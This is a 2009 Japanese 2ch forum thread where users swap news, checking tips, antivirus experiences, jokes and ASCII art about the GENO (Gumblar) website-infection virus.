【Genoウィルス総合スレ】ニフティのオンラインウィルスチェックをする→感染
http://namidame.2ch.net/test/read.cgi/poverty/1242359071/

【ネット】 小林製薬ウェブサイトの一部でサイト改ざん、現在は閉鎖　　閲覧者にはウイルス感染の恐れ [09/05/12]
http://anchorage.2ch.net/test/read.cgi/bizplus/1242271601/


前スレ
【ﾈｯﾄでも】GENOｳｨﾙｽ亜種が爆発的に増殖か 小林製薬や同人ｻｲﾄ他中心に感染も★5【新型ｳｨﾙｽ拡散中】
http://tsushima.2ch.net/test/read.cgi/news/1242555395/

>>960
危険度209パーセント

プニルやIEでもjavascript+ActiveXをoffっときゃ無問題でしょ？

>>960
危険度209%
かなり危険なURLです。友人のPCを壊すのに利用しましょう！
絶対に踏んではいけません。

まあ、レタスの人はPCとかネット苦手だけど必死になんとかやってるって感じだもんなｗ
いつ改竄されててもおかしくないレベル。

＿＿＿＿＿＿＿＿_　　　　 　　／￣￣￣＼　　　　　　＿＿＿＿＿＿＿＿＿＿
＼　　　なら　　　／　　　　　 ./　　あなたのi,　　　　　ヽ　リカバリディスクは ／
　 ＼　安心だ!／　　　n 　　　 | PCは感染 |　　y 　　 ＼ 　　作ってある？／　
　　　＼　　　／　＜―――― .'i,している？ /─┐　　 　 　＼　　　　　　／
　　　　 ＼／　　　　　　　　　　 　＼＿＿＿／　　└──＞　　＼　 　 ／
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 .　　　　　　 ＼／
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　　|
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 　　　／ｙ　　 .|
　　　　　　　　　　　　　　　　　　＿＿＿＿＿＿＿＿_ 　|／ . 　 　　|
　　　　　　　　　　　　　　　　　　＼さっさとリカバリ／　　￣　　 .　　|
　　　　　　　　　　　　　　　　　　　 ＼　 しろ　　 ／　　　　 　　　 　　| ｎ
　　　　　　　　　　　　　　　　　　　　　＼　　　／ 　 　　 .　 　　 　　　|
　　　　　　　　　　　　　　　　　　　　　　 ＼／　　　　　　　　　　　　ヽ|/　　　　　
　　　　　　　　　　　　　　　　　　　　　　　　　　　　／￣￣￣￣￣￣￣￣￣＼
　　　　　　　　　　　　　　　　　　　　　　　　　　　　|　GENOウィルスと共に　　|
　　　　　　　　　　　　　　　　　　　　　　　　　　　　|　　　過ごすPCライフ　　 | 　
　　　　　　　　　　　　　　　　　　　priceless　／　＼＿＿＿＿＿＿＿＿＿／
　　　　　　　　　　　　　　　　　　　　　　　　／　　　　　　　　　｜
　　　　　　　　　　　　　　　　　　　　　　|／　　　　　　 .　　　 　|　旦那に新しいPCを買ってもらう
　　　　　　　　　　　　　　　　　　　　　　￣　　　　　　　　　 　ヽ|/　　　　
　　　　　　　　　　　　／￣￣￣￣￣￣＼　　　.　　|￣￣￣￣￣￣￣＼　　
　　　　　　　　　　　　　|　　ＶＩＰでやれ　　|　　　　　|　　鬼女でやれ　　|　　　　　　
　　　　　　　　　　　　＼＿＿＿＿＿＿／　　　　　.|＿＿＿＿＿＿＿／　　　　

フリーソフトでＯＳイメージをＤＶＤに焼けるようなソフトないですかね

ソフトウェア板行け

>>969
まとめどうり
osが不安定になったりはしてない
意味ないけどWindowsアップデートは出来た

やっと削除出来た

>>976
本当にソフトウェア板に質問しに行ったろｗ

>>943
なんかのマルウェアにやられてるな
間違いなく

ν速公認ベンチマークサイトまでもがｗ

XP厨の悲鳴でメシが旨い

軽いかどうかだけでOS選んでたニュー速民ｗ
たいしたことねーな

>>980
はいｗ

今日にはニコニコのサイトが感染とかになったりして

>>1
>javascript切っていても感染のするとの事

ウソクソ情報
■javascriptを切ってても感染する(5/17現在)
　 今の時点ではウソだが将来的に、pdf or swfをjavascript経由せずに直接読み込ませるタイプのものが出てきたらアウト
　 とにかく↓のアドビ関連のアップデートを怠らないこと。

os             Vista
サイズ　　　　49.5 KB (50,727 バイト)
ディスク上   52.0 KB (53,248 バイト)
作成日時　　2006年11月3日0:55:20
更新日時　　2006年11月3日0:55:20

今から電源切って寝る

vistaもやばい亜種が出たってマジ？

aviraとavast一緒に使ってみてるんだがavastのアンチウイルスやるとavira先生が大激怒するんだがｗｗ

>>978
情報さんくす
感染確かめる方法はまとめので確かなんだね

>>986
涙目動画に名前変えないといけなくなるな

マイコンで右クリすると7割くらいの確立で固まる
スペックが低いわけじゃないのに

>>993感染してたら感染した心当たりのサイト報告

4 名前：以下、名無しにかわりましてVIPがお送りします[] 投稿日：2009/05/18(月) 01:01:39.74 ID:GoatvS/D0
感染チェックツール(暫定最終)
ttp://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認→このツールが起動しない場合はcmd.exeが壊れています
2 ) regedit.exeの起動確認（任意）→UACが出る場合は許可して、起動するのを見届けてください。起動しなければ壊れてます。
3 ) sqlsodbc.chmのファイルサイズ確認→結果がレポートされます。

不安ならテキストエディタで開いてソース読んでから実行してちょうだい。
2000/XP/Vista+7を自動判別して、それぞれに対応したメニューでsqlsodbc.chmを探して
ファイルサイズが正常かどうかチェックします。

めんどくさいから自分のとこに置くようにした。以後は最新版が常にこのURLから取れるようにしておきます。
dotup+番号だと偽物と区別がつきにくいのと、いちいちURL直すのが煩雑で伝わりづらいからです。
batは鯖の設定で置けないんでzipで固めてあります。必要に応じてreadme.txtなんかを追加するかも知れません。
あと万が一私が感染していたとしても、これはHTMLでないのでGENOのコードは埋め込まれません。

>>993
マイコンならメモリ1MBとかか？
そりゃ灰スペックだｗ

>>990
どっちか一方にしないとごねるよ。

マイコンというよりexplorer関係だわ
デスクトップやタスクトレイでも固まる

梅

梅

1000ならＸＰ厨完全敗北

このスレッドは１０００を超えました。
もう書けないので、新しい職を探して下さい。。。

　　　　　　　　　　　　　　　　　　　　　　　　　　　　ニュース速報
　　　　　　　　　　　　　　http://www.hellowork.go.jp/